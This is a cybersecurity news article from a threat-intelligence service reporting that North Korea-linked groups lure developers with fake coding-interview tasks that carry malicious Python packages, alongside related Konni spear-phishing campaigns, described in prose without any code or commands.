Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments. "The new samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews," ReversingLabs researcher Karlo Zanki said. The activity has been assessed to be part of an ongoing VMConnect campaign that first came to light in August 2023. There are indications that it is the handiwork of the North Korea-backed Lazarus Group.[1]
See: https://redskyalliance.org/xindustry/lazarus-group-still-deploys-remote-access-trojans
North Korean threat actors have widely adopted job interviews as an infection vector. They either approach unsuspecting developers on sites such as LinkedIn or trick them into downloading rogue packages as part of a purported skills test. These packages, for their part, have been published directly on public repositories like npm and PyPI or hosted on GitHub repositories under their control.
ReversingLabs said it identified malicious code embedded within modified versions of legitimate PyPI libraries such as Paperclip and Pure Base. "The malicious code is present in both the __init__.py file and its corresponding compiled Python file (PYC) inside the __pycache__ directory of respective modules," Zanki said.
It is implemented as a Base64-encoded string that obscures a downloader function, establishing contact with a command-and-control (C2) server to execute commands received as a response. In one instance of the coding assignment identified by the software supply chain firm, the threat actors sought to create a false sense of urgency by requiring job seekers to build a Python project shared in the form of a ZIP file within five minutes and find and fix a coding flaw in the next 15 minutes.
This makes it "more likely that he or she would execute the package without performing any type of security or even source code review first," Zanki said, adding, "That ensures the malicious actors behind this campaign that the embedded malware would be executed on the developer's system." Some tests claimed to be technical interviews for financial institutions like Capital One and Rookery Capital Limited, underscoring how the threat actors impersonate legitimate companies in the sector to pull off the operation.
It is currently unclear how widespread these campaigns are, although prospective targets are scouted and contacted using LinkedIn. "After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user's macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons," the company said.
The development comes as cybersecurity company Genians revealed that the North Korean threat actor codenamed Konni is intensifying its attacks against Russia and South Korea by employing spear-phishing lures that lead to the deployment of AsyncRAT. Overlaps have been identified with a campaign codenamed CLOUD#REVERSER (aka puNK-002).
Some of these attacks also involve propagating a new malware called CURKON, a Windows shortcut (LNK) file that serves as a downloader for an AutoIt version of Lilith RAT. Per S2W, the activity has been linked to a sub-cluster tracked as puNK-003.
This article is shared at no charge and is for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5378972949933166424
[1] https://thehackernews.com/2024/09/developers-beware-lazarus-group-uses.html
Comments